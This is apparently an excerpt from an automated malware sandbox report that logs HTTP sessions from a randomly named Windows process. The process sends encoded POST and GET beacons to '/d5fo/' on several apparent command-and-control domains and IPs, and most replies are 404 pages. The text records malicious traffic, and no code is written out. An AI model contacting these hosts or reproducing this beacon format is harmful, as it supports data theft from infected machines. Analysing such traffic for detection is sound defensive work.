Jul 25, 2024 12:09:36.183440924 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:09:36 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49742	66.96.162.141	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:38.232345104 CEST	486	OUT	GET /d5fo/?7b7D=uO5Cag4gyB16R4iku6nvf5dW+UrTPsxCj8IlAS8oNZUsLlnW35hToihdihlq36/h3E+gT/kMW6N0rvSH4h3g2fSBlwf/dqlLAFh1+9LorWG4QUGEfHw1eqFMmW/Mf4Jk1w==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.energysecrets.online Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:09:40.913192987 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:09:40 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 2 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49743	67.198.129.29	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:46.256362915 CEST	732	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.www00003.icu Origin: http://www.www00003.icu Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.www00003.icu/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 71 2f 36 49 38 67 4e 74 35 42 2f 46 62 76 6a 58 4b 53 62 63 47 43 70 58 33 4e 78 45 6b 55 67 66 32 57 2f 6b 6b 74 34 35 70 69 41 33 6b 43 44 2b 43 72 46 30 4c 74 71 79 52 47 64 62 71 4c 66 4c 64 2f 79 39 75 58 72 32 32 53 76 46 5a 46 54 71 6d 6a 74 6c 55 30 59 63 6a 74 4d 43 41 6b 51 62 71 6e 66 54 79 33 53 54 36 4a 52 4d 65 79 6d 66 69 6e 47 68 56 37 69 2b 62 77 51 52 75 66 6e 36 78 65 4b 4b 53 73 6a 66 55 35 7a 76 54 76 5a 6e 76 57 59 4c 52 63 4a 64 2f 47 32 50 41 76 49 57 67 52 43 74 32 42 31 54 42 6b 63 52 2f 79 73 68 4e 4a 5a 53 4f 2f 55 6f 59 47 78 4a 4a 31 65 73 52 77 56 68 46 6b 3d Data Ascii: 7b7D=Uq/6I8gNt5B/FbvjXKSbcGCpX3NxEkUgf2W/kkt45piA3kCD+CrF0LtqyRGdbqLfLd/y9uXr22SvFZFTqmjtlU0YcjtMCAkQbqnfTy3ST6JRMeymfinGhV7i+bwQRufn6xeKKSsjfU5zvTvZnvWYLRcJd/G2PAvIWgRCt2B1TBkcR/yshNJZSO/UoYGxJJ1esRwVhFk=
Jul 25, 2024 12:09:46.874442101 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Jul 2024 10:09:46 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49744	67.198.129.29	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:49.221009016 CEST	752	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.www00003.icu Origin: http://www.www00003.icu Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.www00003.icu/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 71 2f 36 49 38 67 4e 74 35 42 2f 46 34 6e 6a 48 62 53 62 55 47 43 32 62 58 4e 78 53 55 55 73 66 32 4b 2f 6b 6d 42 6f 35 62 57 41 33 46 79 44 2f 44 72 46 31 4c 74 71 36 78 48 58 66 71 4c 45 4c 64 79 42 39 72 76 72 32 77 2b 76 46 62 4e 54 72 56 62 79 6e 45 30 67 55 44 74 53 47 41 6b 51 62 71 6e 66 54 32 6e 38 54 2b 74 52 4e 75 43 6d 65 44 6e 48 36 31 37 6a 39 62 77 51 48 65 66 6a 36 78 65 34 4b 52 6f 5a 66 57 78 7a 76 53 7a 5a 6d 39 2b 66 42 52 63 50 44 2f 48 4b 48 6c 65 73 63 7a 70 41 70 46 4d 56 51 48 55 63 51 4a 66 47 37 76 42 78 42 75 54 73 34 4c 4f 47 59 35 55 33 32 79 67 6c 2f 53 79 64 59 54 68 45 53 33 30 35 41 31 46 43 7a 52 66 74 77 56 48 37 Data Ascii: 7b7D=Uq/6I8gNt5B/F4njHbSbUGC2bXNxSUUsf2K/kmBo5bWA3FyD/DrF1Ltq6xHXfqLELdyB9rvr2w+vFbNTrVbynE0gUDtSGAkQbqnfT2n8T+tRNuCmeDnH617j9bwQHefj6xe4KRoZfWxzvSzZm9+fBRcPD/HKHlesczpApFMVQHUcQJfG7vBxBuTs4LOGY5U32ygl/SydYThES305A1FCzRftwVH7
Jul 25, 2024 12:09:49.915518045 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Jul 2024 10:09:49 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49745	67.198.129.29	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:51.868379116 CEST	1769	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.www00003.icu Origin: http://www.www00003.icu Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.www00003.icu/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 71 2f 36 49 38 67 4e 74 35 42 2f 46 34 6e 6a 48 62 53 62 55 47 43 32 62 58 4e 78 53 55 55 73 66 32 4b 2f 6b 6d 42 6f 35 62 75 41 33 33 36 44 39 67 7a 46 32 4c 74 71 30 52 48 61 66 71 4b 65 4c 64 71 65 39 71 53 65 32 31 69 76 45 2b 42 54 2b 51 33 79 75 45 30 67 59 6a 74 50 43 41 6b 42 62 71 33 62 54 79 44 38 54 2b 74 52 4e 6f 6d 6d 64 53 6e 48 39 46 37 69 2b 62 77 69 52 75 66 48 36 78 57 43 4b 51 63 4a 66 6d 52 7a 76 32 54 5a 72 6f 4b 66 43 78 63 4e 58 66 48 53 48 6c 61 7a 63 7a 6c 71 70 45 49 7a 51 41 34 63 63 4f 32 34 76 65 73 6f 66 39 4f 4b 38 49 43 43 4a 4f 30 6d 6f 42 4d 43 39 68 36 47 55 53 39 2f 59 77 35 37 4a 58 38 77 6e 57 4c 5a 30 56 32 44 76 6d 6a 79 73 37 50 34 49 41 61 51 4f 70 4c 56 6d 4e 4f 47 73 2b 4c 77 4c 4f 34 6a 69 63 4e 6e 74 58 74 4d 5a 63 39 76 49 31 2f 53 37 75 7a 67 6d 4c 63 46 58 69 6f 38 50 6d 54 4b 54 7a 77 4c 56 67 71 59 74 4b 4c 4f 55 32 6c 4d 51 73 6c 57 48 71 48 38 4e 41 36 37 59 37 67 32 71 4e 46 74 71 5a 42 49 59 43 71 6e 67 69 6a 51 6b 4c 59 41 76 [TRUNCATED] Data Ascii: 7b7D=Uq/6I8gNt5B/F4njHbSbUGC2bXNxSUUsf2K/kmBo5buA336D9gzF2Ltq0RHafqKeLdqe9qSe21ivE+BT+Q3yuE0gYjtPCAkBbq3bTyD8T+tRNommdSnH9F7i+bwiRufH6xWCKQcJfmRzv2TZroKfCxcNXfHSHlazczlqpEIzQA4ccO24vesof9OK8ICCJO0moBMC9h6GUS9/Yw57JX8wnWLZ0V2Dvmjys7P4IAaQOpLVmNOGs+LwLO4jicNntXtMZc9vI1/S7uzgmLcFXio8PmTKTzwLVgqYtKLOU2lMQslWHqH8NA67Y7g2qNFtqZBIYCqngijQkLYAvL7B/Pu0x5ZcQ5LNl3WMsHUDLspzhAdToQbIJL5IOXtwE1kJ5aK0gPxyLMbkYTkaMvl6UjbY2y2TTurDHRW5PVIazQZq2XODmRPm/NkOcBYGPVi+zo309QaCBvf7YF6Q+Jn7wJmwhWyPzUO6gKiCDcNPH5ufLRrlpJbhjog6ycEaN6mpO01ouEFEoXQjSpl9ix0NZrPQp4GaCEVWmiCwDJpnQzo1I84kUpgzkLl4d0F4QdydIaGfeD9XvQgizLorMOzn87jckS010pOiHcqC/G2ErjH023/iPzi2vbg7htawHy9UrXkyG2TEn9HKTS5vhTRWswE06Qp/40Go9LAjiCazcGCz82SZzeby8MIZx8aC8JOdU31/P8+TOdJpGPS3oYMtShb0yui3ZeJ2AaaKA5pBz3x695NbsJQVsw/l3MBuTed9Sj6Q3IBVIU0KDP46h3DIJJaUo/8R7MunrgQXqRElNBZA+aODkcZwPZ6Edn3nllw7+5uGbt/XG27slzZY8kW3ADBrp9KOi8x7SPRT1GbLX6O11HtAvtruf0hqMOqIw2ahFVvjpAjGy0z3gt3Fx0Op50P47zUXDusy8gTwSlxKMfpoiOyC9fC2k22dR8Zm/O7veMAJGDrBIhah9NpWHnBbaEdbCJJC2tkeyNuw/LFqt6OfBRxVNrW [TRUNCATED]
Jul 25, 2024 12:09:52.441039085 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Jul 2024 10:09:52 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49746	67.198.129.29	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:54.402515888 CEST	478	OUT	GET /d5fo/?7b7D=ZoXaLL1C2LxABKmzU+uAeFGCSUlhX2sBfFTw5kxSjKfk1lG95weQhtNNyHrXPpHYE/uGkrqw326vaL5ZgkXLo2gNXChAFCFsbLn6IDP+WIMmIvKyPAe59HrgtZ5PGeCysw==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.www00003.icu Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:09:55.006993055 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Jul 2024 10:09:54 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49747	3.33.130.190	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:00.064728022 CEST	753	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.primerpaintjobs.com Origin: http://www.primerpaintjobs.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.primerpaintjobs.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 4e 46 62 47 37 45 57 64 32 4b 58 52 78 44 61 63 56 62 34 34 70 77 62 69 71 46 45 4b 36 54 7a 2b 65 68 2f 45 52 30 49 61 77 35 70 4d 74 44 44 67 48 6f 75 78 50 57 35 47 5a 71 5a 53 2b 62 74 5a 73 67 2f 43 49 74 55 56 42 45 7a 68 71 37 34 73 4b 44 51 61 59 4b 53 4d 32 79 48 2f 6a 47 37 42 50 75 6e 77 31 4d 2b 66 49 31 35 5a 62 33 2f 65 78 67 71 74 43 71 53 63 32 43 58 37 33 57 30 49 66 79 70 74 47 71 78 62 35 58 59 4a 5a 57 57 6c 73 52 62 5a 6d 58 38 61 37 34 43 48 4a 47 39 51 36 35 45 59 33 4e 54 2b 4c 68 61 79 6c 65 72 61 66 42 48 37 34 69 48 6b 69 78 53 6c 6e 39 69 57 69 43 78 76 52 66 67 3d Data Ascii: 7b7D=NFbG7EWd2KXRxDacVb44pwbiqFEK6Tz+eh/ER0Iaw5pMtDDgHouxPW5GZqZS+btZsg/CItUVBEzhq74sKDQaYKSM2yH/jG7BPunw1M+fI15Zb3/exgqtCqSc2CX73W0IfyptGqxb5XYJZWWlsRbZmX8a74CHJG9Q65EY3NT+LhaylerafBH74iHkixSln9iWiCxvRfg=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49748	3.33.130.190	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:02.592398882 CEST	773	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.primerpaintjobs.com Origin: http://www.primerpaintjobs.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.primerpaintjobs.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 4e 46 62 47 37 45 57 64 32 4b 58 52 78 6a 4b 63 54 4a 51 34 75 51 62 68 7a 31 45 4b 6f 54 7a 36 65 68 44 45 52 77 77 4b 77 4b 4e 4d 73 69 66 67 47 74 53 78 4d 57 35 47 53 4b 5a 64 6d 37 74 57 73 67 6a 77 49 73 34 56 42 45 6e 68 71 36 49 73 4e 78 34 62 65 61 53 4f 39 53 48 39 73 6d 37 42 50 75 6e 77 31 4d 71 31 49 31 68 5a 63 48 50 65 78 42 71 73 45 61 53 62 2b 69 58 37 7a 57 30 55 66 79 6f 36 47 6f 45 4f 35 56 51 4a 5a 53 65 6c 69 67 62 57 73 58 38 59 31 59 43 58 42 7a 4a 63 37 71 74 58 37 66 50 38 53 77 61 58 67 6f 47 77 46 6a 50 54 72 43 72 63 79 69 61 53 32 4e 44 2f 34 68 68 66 50 49 31 67 41 2f 4e 50 46 61 2f 47 4e 78 57 44 62 2f 65 69 55 6f 65 74 Data Ascii: 7b7D=NFbG7EWd2KXRxjKcTJQ4uQbhz1EKoTz6ehDERwwKwKNMsifgGtSxMW5GSKZdm7tWsgjwIs4VBEnhq6IsNx4beaSO9SH9sm7BPunw1Mq1I1hZcHPexBqsEaSb+iX7zW0Ufyo6GoEO5VQJZSeligbWsX8Y1YCXBzJc7qtX7fP8SwaXgoGwFjPTrCrcyiaS2ND/4hhfPI1gA/NPFa/GNxWDb/eiUoet

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49749	3.33.130.190	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:05.122059107 CEST	1790	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.primerpaintjobs.com Origin: http://www.primerpaintjobs.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.primerpaintjobs.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 4e 46 62 47 37 45 57 64 32 4b 58 52 78 6a 4b 63 54 4a 51 34 75 51 62 68 7a 31 45 4b 6f 54 7a 36 65 68 44 45 52 77 77 4b 77 4b 46 4d 73 51 58 67 47 4f 36 78 4e 57 35 47 66 71 5a 4e 6d 37 74 4c 73 67 37 30 49 73 45 46 42 42 6a 68 71 63 38 73 49 46 73 62 58 61 53 4f 79 79 48 2b 6a 47 37 75 50 6f 48 4f 31 4d 36 31 49 31 68 5a 63 46 6e 65 34 77 71 73 66 61 53 63 32 43 58 2f 33 57 30 6f 66 32 46 50 47 6f 51 65 35 6b 77 4a 41 79 4f 6c 67 53 7a 57 78 48 38 57 32 59 44 49 42 7a 4d 43 37 72 41 6f 37 65 71 5a 53 33 75 58 67 73 54 77 56 69 37 57 36 53 33 39 35 42 4b 31 6b 62 7a 6c 34 53 42 33 4d 66 51 48 45 74 6b 74 44 36 50 57 4f 79 33 78 43 6f 53 55 61 73 37 6e 66 4f 65 56 74 48 6b 62 56 32 62 4e 4e 37 41 59 69 79 6f 70 2f 73 30 4b 58 53 78 6d 37 71 51 4a 30 47 4f 53 74 78 38 33 55 4a 37 79 70 62 46 41 54 64 61 49 2b 53 4a 67 50 2b 32 78 43 54 66 50 2f 53 52 79 62 6b 49 6e 65 4c 65 68 4e 74 63 57 64 4e 45 57 36 42 79 52 30 4b 43 6d 4b 68 43 75 44 65 4f 49 72 71 7a 55 2f 53 66 59 2f 74 6d 41 63 [TRUNCATED] Data Ascii: 7b7D=NFbG7EWd2KXRxjKcTJQ4uQbhz1EKoTz6ehDERwwKwKFMsQXgGO6xNW5GfqZNm7tLsg70IsEFBBjhqc8sIFsbXaSOyyH+jG7uPoHO1M61I1hZcFne4wqsfaSc2CX/3W0of2FPGoQe5kwJAyOlgSzWxH8W2YDIBzMC7rAo7eqZS3uXgsTwVi7W6S395BK1kbzl4SB3MfQHEtktD6PWOy3xCoSUas7nfOeVtHkbV2bNN7AYiyop/s0KXSxm7qQJ0GOStx83UJ7ypbFATdaI+SJgP+2xCTfP/SRybkIneLehNtcWdNEW6ByR0KCmKhCuDeOIrqzU/SfY/tmAcvz/+ChwMAiTyen/h+5e2X+8lONaUVeQ/R1d58JbaWAt6ujXcnUyuFjFFwDNybnH3uX5pzjFUwC0tQ2zwWBMhhdbEmwy1HUxKOBJoG6xnFCNw7CR5RB9oWRyNIyy904mBdoo4YMuUeibT/e6l2pZzKnbQn407lEDijcV309R9k5ZYFKd1QxSun+s5IEjQgK4V8O8wIrg+XelgKRhH0loKSSfeIN+KgUwMs9XcZTQItzeghKF5NPg0WayHYwBDxuBiExRrIR9R7+U6RnE0J33TpRO+e0guXN54TNJlcH45ygxYBuuJvs8ckuD773hZIBIZzF9aP2+NBFtDRobLlteuz3CkKqe794ipAPuVX1vW4UTwyyNFjPlHk8la5rrKC80Y9YD8sXK8n/xyEcDToZxY+PSZZz79cS5U2TJDQD+J967aUf6xFHK+BSPxQ0dXIsGj/fuBj/osEzbumBCP7Fj8rIxGfsGJlyO85z0K+bIh+qYKMxz11uYyhvGRISoFqL1C2fYEe3racXp3NKXMhSViSNvDWZBBvYavS/SA+QEiqwufOjJryaAU34L10y7ocN2CfJe/QMd9ot0y42VylFzz6Bu75APoRlvVRzhMFtnhOYoR75ABnGJsD9HYUJFA7EGZdkSqO5hMzCvn9iSBV9KSwl6oKfJLuiih2n [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49750	3.33.130.190	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
